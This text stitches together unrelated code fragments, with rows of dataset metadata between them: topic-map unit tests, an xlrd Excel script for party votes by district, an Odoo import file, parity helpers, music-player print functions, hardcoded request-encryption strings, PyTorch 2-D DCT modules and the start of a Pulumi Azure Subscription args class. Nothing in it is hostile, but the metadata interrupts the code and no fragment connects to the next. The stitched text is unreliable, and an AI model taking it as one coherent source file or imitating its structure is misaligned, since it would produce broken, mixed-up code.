    """An association created with two themes carries both in its scope."""
    type_topic = self.create_topic()
    theme = self.create_topic()
    theme2 = self.create_topic()
    self.assertEqual(0, self.tm.get_associations().count())
    association = self.tm.create_association(type_topic, (theme, theme2))
    self.assertEqual(1, self.tm.get_associations().count())
    self.assertIn(association, self.tm.get_associations())
    self.assertEqual(0, association.get_roles().count())
    self.assertEqual(type_topic, association.get_type())
    self.assertEqual(2, association.get_scope().count())
    self.assertIn(theme, association.get_scope())
    self.assertIn(theme2, association.get_scope())
def test_association_creation_illegal_type(self):
    """Creating an association with no type is rejected."""
    with self.assertRaises(ModelConstraintException):
        self.tm.create_association(None)
def test_association_creation_illegal_type_scope(self):
    """Supplying a scope does not make a type-less association legal."""
    with self.assertRaises(ModelConstraintException):
        self.tm.create_association(None, [self.tm.create_topic()])
def test_association_creation_illegal_null_collection_scope (self):
    # A "null collection" scope argument cannot be expressed in Python
    # (None is already covered above), so this upstream test is a no-op here.
    # This test is not applicable in this implementation.
    pass
def test_association_creation_illegal_null_array_scope (self):
    # A "null array" scope argument has no Python equivalent, so this
    # upstream test is a no-op here.
    # This test is not applicable in this implementation.
    pass
def test_get_from_topic_creation_subject_identifier(self):
    """Verify that create_topic_by_subject_identifier returns the
    existing topic where that topic has an item identifier
    matching the subject identifier."""
    locator = self.create_locator('http://www.example.org/')
    self.assertEqual(0, self.tm.get_topics().count())
    topic = self.tm.create_topic_by_item_identifier(locator)
    self.assertEqual(1, self.tm.get_topics().count())
    self.assertIn(topic, self.tm.get_topics())
    self.assertEqual(0, topic.get_subject_identifiers().count())
    self.assertEqual(1, topic.get_item_identifiers().count())
    self.assertEqual(0, topic.get_subject_locators().count())
    # Creating by subject identifier must reuse the existing topic and
    # add the locator as a subject identifier rather than make a new topic.
    t = self.tm.create_topic_by_subject_identifier(locator)
    self.assertEqual(1, self.tm.get_topics().count())
    self.assertEqual(1, topic.get_subject_identifiers().count())
    self.assertEqual(1, topic.get_item_identifiers().count())
    self.assertEqual(0, topic.get_subject_locators().count())
    self.assertEqual(topic, t)
def test_get_from_creation_item_identifier(self):
    """Verify that create_topic_by_item_identifier returns the
    existing topic where that topic has a subject identifier
    matching the item identifier."""
    locator = self.create_locator('http://www.example.org/')
    self.assertEqual(0, self.tm.get_topics().count())
    topic = self.tm.create_topic_by_subject_identifier(locator)
    self.assertEqual(1, self.tm.get_topics().count())
    self.assertIn(topic, self.tm.get_topics())
    self.assertEqual(1, topic.get_subject_identifiers().count())
    self.assertEqual(0, topic.get_item_identifiers().count())
    self.assertEqual(0, topic.get_subject_locators().count())
    # Creating by item identifier must reuse the existing topic and
    # add the locator as an item identifier rather than make a new topic.
    t = self.tm.create_topic_by_item_identifier(locator)
    self.assertEqual(1, self.tm.get_topics().count())
    self.assertEqual(1, topic.get_subject_identifiers().count())
    self.assertEqual(1, topic.get_item_identifiers().count())
    self.assertEqual(0, topic.get_subject_locators().count())
    self.assertEqual(topic, t)
def test_get_index(self):
    """Requesting an unknown index type raises UnsupportedOperationException."""
    with self.assertRaises(UnsupportedOperationException):
        self.tm.get_index(BogusIndex)
class BogusIndex (object):
    """Dummy index type used only to exercise the unsupported-index error path."""
    pass
| 47.553991
| 79
| 0.698687
| 1,260
| 10,129
| 5.380952
| 0.114286
| 0.143805
| 0.049115
| 0.044248
| 0.825959
| 0.807227
| 0.766667
| 0.737021
| 0.726254
| 0.699705
| 0
| 0.009022
| 0.190246
| 10,129
| 212
| 80
| 47.778302
| 0.817605
| 0.118077
| 0
| 0.685897
| 0
| 0
| 0.018163
| 0
| 0
| 0
| 0
| 0
| 0.544872
| 1
| 0.128205
| false
| 0.019231
| 0.012821
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0f592824ee2c266c1ac968dcc2a2186f6007519f
| 4,109
|
py
|
Python
|
Followers.py
|
jemmypotter/Python
|
c8fc5c49c5289dc0598c93eef4cfbcb5701c2b32
|
[
"bzip2-1.0.6"
] | null | null | null |
Followers.py
|
jemmypotter/Python
|
c8fc5c49c5289dc0598c93eef4cfbcb5701c2b32
|
[
"bzip2-1.0.6"
] | null | null | null |
Followers.py
|
jemmypotter/Python
|
c8fc5c49c5289dc0598c93eef4cfbcb5701c2b32
|
[
"bzip2-1.0.6"
] | null | null | null |
import xlrd
from tkinter.filedialog import askopenfilename
def path():
    """Open a file-picker dialog and return the path the user chose."""
    return askopenfilename()
def part():
    """Return the 12 party names read from the chosen spreadsheet.

    Prompts the user for a file (via path()), then reads row 10,
    columns 9-20 of the first sheet.

    :returns: list of 12 party-name cell values, in column order.
    """
    workbook = xlrd.open_workbook(path())
    worksheet = workbook.sheet_by_index(0)
    # One name per party column; order matches the vote columns read elsewhere.
    return [worksheet.cell_value(10, col) for col in range(9, 21)]
def dists():
    """Return the 39 district names read from the chosen spreadsheet.

    Prompts the user for a file (via path()), then reads rows 11-49,
    column 2 of the first sheet.

    :returns: list of 39 district-name cell values, in row order.
    """
    workbook = xlrd.open_workbook(path())
    worksheet = workbook.sheet_by_index(0)
    return [worksheet.cell_value(row, 2) for row in range(11, 50)]
# NOTE(review): module-level debug call — importing this module pops up a
# file-picker dialog and prints the district list as a side effect.
print(dists())
def check():
    """Build a mapping from party name to that party's per-district votes.

    Prompts for the spreadsheet (twice: once here, once inside part()),
    then reads rows 11-49 of columns 9-20 — one column per party, in the
    same order part() reads the party names.

    :returns: dict mapping each of the 12 party names to a list of the
        39 vote cell values for that party.
    """
    path1 = path()
    parties = part()
    # NOTE(review): the original also called dists() here and discarded the
    # result; its only visible effect was popping up a third file dialog,
    # so the call was removed.
    workbook = xlrd.open_workbook(path1)
    worksheet = workbook.sheet_by_index(0)
    whole = {}
    # Column 9 + offset holds the votes for parties[offset].
    for offset, party in enumerate(parties):
        whole[party] = [worksheet.cell_value(row, 9 + offset)
                        for row in range(11, 50)]
    return whole
#print(check())
def check2():
    """Print a dictionary keyed by party name.

    Reads the vote columns exactly like check(), but then overwrites every
    value with the district name for that row, so the printed value for
    each party is a copy of the district list.
    """
    path1 = path()
    parties = part()
    districts = dists()
    workbook = xlrd.open_workbook(path1)
    worksheet = workbook.sheet_by_index(0)
    whole = {}
    for offset, party in enumerate(parties):
        column = [worksheet.cell_value(row, 9 + offset)
                  for row in range(11, 50)]
        # NOTE(review): preserved from the original — this clobbers all 39
        # vote values with district names, so the votes read above are
        # discarded. Looks like a bug; confirm the intended output.
        for idx in range(0, 39):
            column[idx] = districts[idx]
        whole[party] = column
    print(whole)
# Script entry point: prompts for the spreadsheet several times and prints
# the assembled dictionary.
check2()
| 27.032895
| 85
| 0.613531
| 552
| 4,109
| 4.411232
| 0.161232
| 0.096099
| 0.184805
| 0.187269
| 0.826283
| 0.826283
| 0.779877
| 0.779877
| 0.779877
| 0.779877
| 0
| 0.069213
| 0.254563
| 4,109
| 151
| 86
| 27.211921
| 0.725759
| 0.003407
| 0
| 0.79021
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034965
| false
| 0
| 0.013986
| 0
| 0.076923
| 0.013986
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
0f5cea0a294e94e966938fe384841a587b229494
| 137
|
py
|
Python
|
addons/test_mail/models/__init__.py
|
SHIVJITH/Odoo_Machine_Test
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
[
"Apache-2.0"
] | null | null | null |
addons/test_mail/models/__init__.py
|
SHIVJITH/Odoo_Machine_Test
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
[
"Apache-2.0"
] | null | null | null |
addons/test_mail/models/__init__.py
|
SHIVJITH/Odoo_Machine_Test
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from . import test_mail_models
from . import test_mail_corner_case_models
from . import test_mail_thread_models
| 22.833333
| 42
| 0.781022
| 21
| 137
| 4.666667
| 0.52381
| 0.306122
| 0.428571
| 0.55102
| 0.489796
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008403
| 0.131387
| 137
| 5
| 43
| 27.4
| 0.815126
| 0.153285
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0f80b5877d002f067a34c87c2dba7b3dbd01e52b
| 711
|
py
|
Python
|
xutilities/numeric.py
|
stbraun/xutilities
|
c5c83a3dea406a5d24c07c16cbe9039302445d3b
|
[
"MIT"
] | null | null | null |
xutilities/numeric.py
|
stbraun/xutilities
|
c5c83a3dea406a5d24c07c16cbe9039302445d3b
|
[
"MIT"
] | null | null | null |
xutilities/numeric.py
|
stbraun/xutilities
|
c5c83a3dea406a5d24c07c16cbe9039302445d3b
|
[
"MIT"
] | null | null | null |
# coding=utf-8
"""
Some utilities related to numbers.
"""
def is_even(num: int) -> bool:
    """Is num even?

    :param num: number to check.
    :type num: int
    :returns: True if num is even.
    :rtype: bool
    :raises: ``TypeError`` if num is not an int.
    """
    if isinstance(num, int):
        # An int is even exactly when its lowest bit is clear.
        return (num & 1) == 0
    raise TypeError("{} is not an int".format(num))
def is_odd(num: int) -> bool:
    """Is num odd?

    :param num: number to check.
    :type num: int
    :returns: True if num is odd.
    :rtype: bool
    :raises: ``TypeError`` if num is not an int.
    """
    if isinstance(num, int):
        # An int is odd exactly when its lowest bit is set.
        return (num & 1) == 1
    raise TypeError("{} is not an int".format(num))
| 21.545455
| 55
| 0.57384
| 108
| 711
| 3.759259
| 0.314815
| 0.08867
| 0.068966
| 0.098522
| 0.82266
| 0.748768
| 0.748768
| 0.748768
| 0.748768
| 0.748768
| 0
| 0.009804
| 0.2827
| 711
| 32
| 56
| 22.21875
| 0.786275
| 0.4782
| 0
| 0.5
| 0
| 0
| 0.105611
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7e501f15c970b26484e13d22856614a97e027c0a
| 1,543
|
py
|
Python
|
spotifix/print_func.py
|
FlorianLeveil/UF_DEV_LOGICIEL
|
c48fd1ec5a7c89f03fbe1679b4306fdda3ddf46e
|
[
"MIT"
] | null | null | null |
spotifix/print_func.py
|
FlorianLeveil/UF_DEV_LOGICIEL
|
c48fd1ec5a7c89f03fbe1679b4306fdda3ddf46e
|
[
"MIT"
] | null | null | null |
spotifix/print_func.py
|
FlorianLeveil/UF_DEV_LOGICIEL
|
c48fd1ec5a7c89f03fbe1679b4306fdda3ddf46e
|
[
"MIT"
] | null | null | null |
# ANSI terminal escape codes: reset all attributes / bright-green foreground.
ENDC = '\033[0m'
OKGREEN = '\033[92m'
def print_play_my_playlist(playlist_name, name_song, artist, total_time, prefix, bar, percent, suffix):
    """Redraw the "now playing from my playlist" screen in place."""
    # Move the cursor up 13 lines so the screen is redrawn over itself.
    print("\033[F" * 13)
    screen = [
        f'{playlist_name} | {name_song} | {artist} | {total_time[:7]}',
        f'{prefix}|{OKGREEN}{bar}{ENDC}|{percent[:7]} {suffix}',
        '',
        'p : Pause',
        'l : Play',
        '+ / - : Volume',
        's : Shuffle',
        'n : Next Song',
        'b : Previous Song',
        'x : exit',
        '',
        '',
    ]
    print('\n'.join(screen))
def print_play_one_song(name_song, artist, total_time, prefix, bar, percent, suffix):
    """Redraw the "now playing a single song" screen in place."""
    # Move the cursor up 13 lines so the screen is redrawn over itself.
    print("\033[F" * 13)
    screen = [
        f'{name_song} | {artist} | {total_time[:7]}',
        f'{prefix}|{OKGREEN}{bar}{ENDC}|{percent[:7]} {suffix}',
        '',
        'p : Pause',
        'l : Play',
        '+ : Up Volume',
        '- : Down Volume',
        'r : Add to a playlist',
        'x : exit',
        '',
        '',
        '',
    ]
    print('\n'.join(screen))
def print_play_playlist(playlist_name, name_song, artist, total_time, prefix, bar, percent, suffix):
    """Redraw the "now playing from a public playlist" screen in place."""
    # Move the cursor up 13 lines so the screen is redrawn over itself.
    print("\033[F" * 13)
    screen = [
        f'{playlist_name} | {name_song} | {artist} | {total_time[:7]}',
        f'{prefix}|{OKGREEN}{bar}{ENDC}|{percent[:7]} {suffix}',
        '',
        'p : Pause',
        'l : Play',
        '+ / - : Volume',
        's : Shuffle',
        'n : Next Song',
        'b : Previous Song',
        'a : Follow this playlist',
        'x : exit',
        '',
    ]
    print('\n'.join(screen))
| 27.553571
| 103
| 0.474401
| 200
| 1,543
| 3.54
| 0.22
| 0.067797
| 0.118644
| 0.161017
| 0.879944
| 0.830508
| 0.830508
| 0.779661
| 0.779661
| 0.779661
| 0
| 0.02893
| 0.327933
| 1,543
| 56
| 104
| 27.553571
| 0.653809
| 0
| 0
| 0.754717
| 0
| 0
| 0.396373
| 0.083549
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056604
| false
| 0
| 0
| 0
| 0.056604
| 0.169811
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7e813e68c2c720702287979e433631f480d9f6f5
| 475
|
py
|
Python
|
utils/emuns.py
|
venthent/MusicDownloader
|
76052513ccdc4b6ebb0fc0d2d05a39debc76263d
|
[
"Apache-2.0"
] | null | null | null |
utils/emuns.py
|
venthent/MusicDownloader
|
76052513ccdc4b6ebb0fc0d2d05a39debc76263d
|
[
"Apache-2.0"
] | null | null | null |
utils/emuns.py
|
venthent/MusicDownloader
|
76052513ccdc4b6ebb0fc0d2d05a39debc76263d
|
[
"Apache-2.0"
] | null | null | null |
# NOTE(review): the trailing comma makes PARAMS a one-element *tuple*, not a
# string — confirm whether callers expect PARAMS[0] or whether the comma is a
# bug. Both values look like opaque request-encryption blobs (base64 / hex);
# treated as opaque constants here.
PARAMS = 'Ef9lNdClTjkbPliRqRyzMvS5YAwFt6Qcelx8fba8CkPPaQaO7sodt2Ei9M58RJZDd/o/pX94EYfdR40Wtg1JMgpV5hcsUQthNtpneuM2oCQVc/G7moHQRUzT4oobALKlAJ5/Kw1BH30vvNRRUgTY4i2w0VI5MkJyNWDK4c80CDR1/L9soSmDkfn/lmhId3fx',
ENCSecKey="38ea911cdb0a1effa4c6ea420475ad8908913b9b207ec3d30cc98302d9c44605b327a79b75996939321dc2d02edf48f324c1045c7c7f10fd6956c417d273ab84bb5ddf57efdef1d4e9c3e91c97ea7abff75578e7cf25e1a9f3f03fcde61d1e4db326887d03c5749a3db843b6b06a9da539f32cfe4d27d7e86486d31a69daf52b"
| 118.75
| 268
| 0.962105
| 10
| 475
| 45.7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.395745
| 0.010526
| 475
| 3
| 269
| 158.333333
| 0.576596
| 0
| 0
| 0
| 0
| 0
| 0.945148
| 0.945148
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7e96408f30552bef242a2f0e7a1b2a0f9ebf4bd8
| 7,196
|
py
|
Python
|
GPBlend/dct_module.py
|
GuardSkill/ImageBlend
|
2c5f5b50882d438557fd380173ed74cb52832b92
|
[
"Apache-2.0"
] | null | null | null |
GPBlend/dct_module.py
|
GuardSkill/ImageBlend
|
2c5f5b50882d438557fd380173ed74cb52832b92
|
[
"Apache-2.0"
] | null | null | null |
GPBlend/dct_module.py
|
GuardSkill/ImageBlend
|
2c5f5b50882d438557fd380173ed74cb52832b92
|
[
"Apache-2.0"
] | null | null | null |
import time
import torch
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
import numbers
import numpy as np
class dctmodule(nn.Module):
    """DCT-II along the last dimension, computed via an FFT of the
    even/odd-reordered input.

    NOTE(review): W_r / W_i are derived from a Parameter but stored as
    plain tensors, so they are not registered as parameters/buffers and
    will not follow the module across .to(device) calls — compare the
    explicit _apply override in dctmodule2D below; confirm intent.
    """

    def __init__(self, shape):
        # shape[-1] fixes the transform length N at construction time.
        super(dctmodule, self).__init__()
        N = shape[-1]
        # Twiddle angles -pi*k/(2N) for k = 0..N-1.
        k = torch.nn.Parameter(- torch.arange(N, dtype=float)[None, :] * np.pi / (2 * N))
        self.W_r = torch.cos(k)
        self.W_i = torch.sin(k)

    def forward(self, x, norm=None):
        """Apply the DCT along the last axis of x.

        norm='ortho' applies orthonormal scaling; otherwise the unscaled
        (2x) DCT-II coefficients are returned.
        """
        x_shape = x.shape
        N = x_shape[-1]
        x = x.contiguous().view(-1, N)
        # Reorder: even-index samples, then the odd-index samples reversed.
        v = torch.cat([x[:, ::2], x[:, 1::2].flip([1])], dim=1)
        # Vc = torch.rfft(v, 1, onesided=False) #
        Vc = torch.view_as_real(torch.fft.fft(v, dim=1))  # pytorch 1.9 API
        # Real part of FFT(v) * exp(-i*pi*k/(2N)).
        V = Vc[:, :, 0] * self.W_r - Vc[:, :, 1] * self.W_i
        if norm == 'ortho':
            V[:, 0] /= np.sqrt(N) * 2
            V[:, 1:] /= np.sqrt(N / 2) * 2
        V = 2 * V.view(*x_shape)
        return V
class dctmodule2D(nn.Module):
    """2-D DCT-II over the last two dimensions: a 1-D DCT along the last
    axis, a transpose, a 1-D DCT along the (new) last axis, and a
    transpose back. Transform sizes are fixed from `shape` at init."""

    def __init__(self, shape):
        super(dctmodule2D, self).__init__()
        # "weight" = last axis (width), "height" = second-to-last axis.
        N_weight = shape[-1]
        # Twiddle angles -pi*k/(2N) for the width transform.
        k_weight = - torch.arange(N_weight, dtype=float)[None, :] * np.pi / (2 * N_weight)
        self.W_r_weight = torch.nn.Parameter(torch.cos(k_weight))
        self.W_i_weight = torch.nn.Parameter(torch.sin(k_weight))
        # Precomputed gather indices for the even/odd reordering
        # (equivalent to x[:, ::2] followed by reversed x[:, 1::2]).
        self.inverted_index_weight = torch.arange(N_weight - 1, 0, -2)
        self.index_weight = torch.arange(0, N_weight, 2)
        N_height = shape[-2]
        k_height = - torch.arange(N_height, dtype=float)[None, :] * np.pi / (2 * N_height)
        self.W_r_height = torch.nn.Parameter(torch.cos(k_height))
        self.W_i_height = torch.nn.Parameter(torch.sin(k_height))
        self.inverted_index_height = torch.arange(N_height - 1, 0, -2)
        self.index_height = torch.arange(0, N_height, 2)
        self.N_weight = N_weight
        self.N_height = N_height

    def _apply(self, fn):
        # Index tensors are not Parameters, so nn.Module's _apply would not
        # move them to the target device/dtype — forward fn to them manually.
        super(dctmodule2D, self)._apply(fn)
        self.inverted_index_weight = fn(self.inverted_index_weight)
        self.inverted_index_height = fn(self.inverted_index_height)
        self.W_r_weight = fn(self.W_r_weight)
        self.W_i_weight = fn(self.W_i_weight)
        self.W_r_height = fn(self.W_r_height)
        self.W_i_height = fn(self.W_i_height)
        return self

    def forward(self, x, norm='ortho'):
        """2-D DCT of x over its last two axes.

        Assumes x's last two axes match the `shape` given at construction —
        TODO confirm; no runtime check is performed.
        """
        # ---- DCT along the last axis (width) ----
        x_shape = x.shape
        N = self.N_weight
        x = x.contiguous().view(-1, N)
        # v = torch.cat([x[:, ::2], x[:, 1::2].flip([1])], dim=1)
        v = torch.cat([x[:, self.index_weight], x[:, self.inverted_index_weight]], dim=1)
        # Vc = torch.rfft(v, 1, onesided=False) #
        Vc = torch.view_as_real(torch.fft.fft(v.float(), dim=1))  # pytorch 1.9 API
        # Vc = torch.view_as_real(torch.fft.fft(v, dim=1))
        V = Vc[:, :, 0] * self.W_r_weight - Vc[:, :, 1] * self.W_i_weight
        if norm == 'ortho':
            V[:, 0] /= np.sqrt(N) * 2
            V[:, 1:] /= np.sqrt(N / 2) * 2
        V = 2 * V.view(*x_shape)
        # ---- DCT along the second-to-last axis (height), via transpose ----
        x = V.transpose(-1, -2)
        x_shape = x.shape
        N = self.N_height
        x = x.contiguous().view(-1, N)
        # v = torch.cat([x[:, ::2], x[:, 1::2].flip([1])], dim=1)
        v = torch.cat([x[:, self.index_height], x[:, self.inverted_index_height]], dim=1)
        # Vc = torch.rfft(v, 1, onesided=False)
        # torch.cuda.synchronize()
        # TEST_TIME = time.time()
        Vc = torch.view_as_real(torch.fft.fft(v, dim=1))  # pytorch 1.9; the second FFT dominates the runtime
        # Vc = torch.view_as_real(torch.fft.fft(v, dim=1))
        # Vc = Vc
        # torch.cuda.synchronize()
        # print('TEST TIME', (time.time() - TEST_TIME) * 1000)
        V = Vc[:, :, 0] * self.W_r_height - Vc[:, :, 1] * self.W_i_height
        if norm == 'ortho':
            V[:, 0] /= np.sqrt(N) * 2
            V[:, 1:] /= np.sqrt(N / 2) * 2
        V = 2 * V.view(*x_shape)
        V = V.transpose(-1, -2)
        return V
class idctmodule2D(nn.Module):
    """Inverse of dctmodule2D: 2-D DCT-III (inverse DCT-II) over the last
    two dimensions, applied axis-by-axis with a transpose in between.
    Note the twiddle angles here are +pi*k/(2N) (positive sign)."""

    def __init__(self, shape):
        super(idctmodule2D, self).__init__()
        # "weight" = last axis (width), "height" = second-to-last axis.
        N_weight = shape[-1]
        # Twiddle angles +pi*k/(2N) for the width transform.
        k_weight = torch.arange(N_weight, dtype=float)[None, :] * np.pi / (2 * N_weight)
        self.W_r_weight = torch.nn.Parameter(torch.cos(k_weight))
        self.W_i_weight = torch.nn.Parameter(torch.sin(k_weight))
        # NOTE(review): these index tensors are set but never read in this
        # class's forward — presumably copied from dctmodule2D; confirm.
        self.inverted_index_weight = torch.arange(N_weight - 1, 0, -2)
        self.index_weight = torch.arange(0, N_weight, 2)
        N_height = shape[-2]
        k_height = torch.arange(N_height, dtype=float)[None, :] * np.pi / (2 * N_height)
        self.W_r_height = torch.nn.Parameter(torch.cos(k_height))
        self.W_i_height = torch.nn.Parameter(torch.sin(k_height))
        self.inverted_index_height = torch.arange(N_height - 1, 0, -2)
        self.index_height = torch.arange(0, N_height, 2)
        self.N_weight = N_weight
        self.N_height = N_height

    def _apply(self, fn):
        # Index tensors are not Parameters, so nn.Module's _apply would not
        # move them to the target device/dtype — forward fn to them manually.
        super(idctmodule2D, self)._apply(fn)
        self.inverted_index_weight = fn(self.inverted_index_weight)
        self.inverted_index_height = fn(self.inverted_index_height)
        self.W_r_weight = fn(self.W_r_weight)
        self.W_i_weight = fn(self.W_i_weight)
        self.W_r_height = fn(self.W_r_height)
        self.W_i_height = fn(self.W_i_height)
        return self

    def forward(self, X, norm='ortho'):
        """Inverse 2-D DCT of X over its last two axes.

        norm='ortho' undoes the orthonormal scaling applied by dctmodule2D.
        """
        # ---- inverse DCT along the last axis (width) ----
        x_shape = X.shape
        N = self.N_weight
        X_v = X.contiguous().view(-1, x_shape[-1]) / 2
        if norm == 'ortho':
            X_v[:, 0] *= np.sqrt(N) * 2
            X_v[:, 1:] *= np.sqrt(N / 2) * 2
        # Rebuild the complex spectrum: imaginary part is the negated,
        # flipped coefficients with a zero in slot 0.
        V_t_r = X_v
        V_t_i = torch.cat([X_v[:, :1] * 0, -X_v.flip([1])[:, :-1]], dim=1)
        V_r = V_t_r * self.W_r_weight - V_t_i * self.W_i_weight
        V_i = V_t_r * self.W_i_weight + V_t_i * self.W_r_weight
        V = torch.cat([V_r.unsqueeze(2), V_i.unsqueeze(2)], dim=2)
        # v = torch.irfft(V, 1, onesided=False)  (pre-1.8 API)
        v = torch.fft.irfft(torch.view_as_complex(V), n=V.shape[1], dim=1)  # torch 1.9
        # v = torch.fft.irfft(torch.view_as_complex(V.float()), n=V.shape[1], dim=1).half() # torch 1.9
        # Undo the even/odd reordering done by the forward DCT.
        x = v.new_zeros(v.shape)
        x[:, ::2] += v[:, :N - (N // 2)]
        x[:, 1::2] += v.flip([1])[:, :N // 2]
        x = x.view(*x_shape)
        # ---- inverse DCT along the second-to-last axis (height) ----
        X = x.transpose(-1, -2)
        x_shape = X.shape
        N = self.N_height
        X_v = X.contiguous().view(-1, x_shape[-1]) / 2
        if norm == 'ortho':
            X_v[:, 0] *= np.sqrt(N) * 2
            X_v[:, 1:] *= np.sqrt(N / 2) * 2
        V_t_r = X_v
        V_t_i = torch.cat([X_v[:, :1] * 0, -X_v.flip([1])[:, :-1]], dim=1)
        V_r = V_t_r * self.W_r_height - V_t_i * self.W_i_height
        V_i = V_t_r * self.W_i_height + V_t_i * self.W_r_height
        V = torch.cat([V_r.unsqueeze(2), V_i.unsqueeze(2)], dim=2)
        # v = torch.irfft(V, 1, onesided=False)  (pre-1.8 API)
        v = torch.fft.irfft(torch.view_as_complex(V), n=V.shape[1], dim=1)
        # v = torch.fft.irfft(torch.view_as_complex(V.float()), n=V.shape[1], dim=1).half() # torch 1.9
        x = v.new_zeros(v.shape)
        x[:, ::2] += v[:, :N - (N // 2)]
        x[:, 1::2] += v.flip([1])[:, :N // 2]
        x = x.view(*x_shape)
        return x.transpose(-1, -2)
| 35.800995
| 104
| 0.550306
| 1,178
| 7,196
| 3.140068
| 0.066214
| 0.054069
| 0.032441
| 0.021627
| 0.85077
| 0.825088
| 0.800757
| 0.77183
| 0.765883
| 0.757772
| 0
| 0.032035
| 0.27557
| 7,196
| 200
| 105
| 35.98
| 0.677537
| 0.111034
| 0
| 0.702899
| 0
| 0
| 0.005493
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057971
| false
| 0
| 0.057971
| 0
| 0.173913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e5319be9f03e79c1c36f0d06449324335ec6baa
| 27,772
|
py
|
Python
|
sdk/python/pulumi_azure/core/subscription.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/core/subscription.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/core/subscription.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['SubscriptionArgs', 'Subscription']
@pulumi.input_type
class SubscriptionArgs:
    # Auto-generated (tfgen) resource-args class: each constructor argument is
    # mirrored by a getter/setter property pair backed by pulumi.get/pulumi.set.
    def __init__(__self__, *,
                 subscription_name: pulumi.Input[str],
                 alias: Optional[pulumi.Input[str]] = None,
                 billing_scope_id: Optional[pulumi.Input[str]] = None,
                 subscription_id: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 workload: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a Subscription resource.
        :param pulumi.Input[str] subscription_name: The Name of the Subscription. This is the Display Name in the portal.
        :param pulumi.Input[str] alias: The Alias name for the subscription. This provider will generate a new GUID if this is not supplied. Changing this forces a new Subscription to be created.
        :param pulumi.Input[str] billing_scope_id: The Azure Billing Scope ID. Can be a Microsoft Customer Account Billing Scope ID, a Microsoft Partner Account Billing Scope ID or an Enrollment Billing Scope ID.
        :param pulumi.Input[str] subscription_id: The ID of the Subscription. Changing this forces a new Subscription to be created.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Subscription.
        :param pulumi.Input[str] workload: The workload type of the Subscription. Possible values are `Production` (default) and `DevTest`. Changing this forces a new Subscription to be created.
        """
        # Only explicitly supplied optional arguments are stored on the input bag.
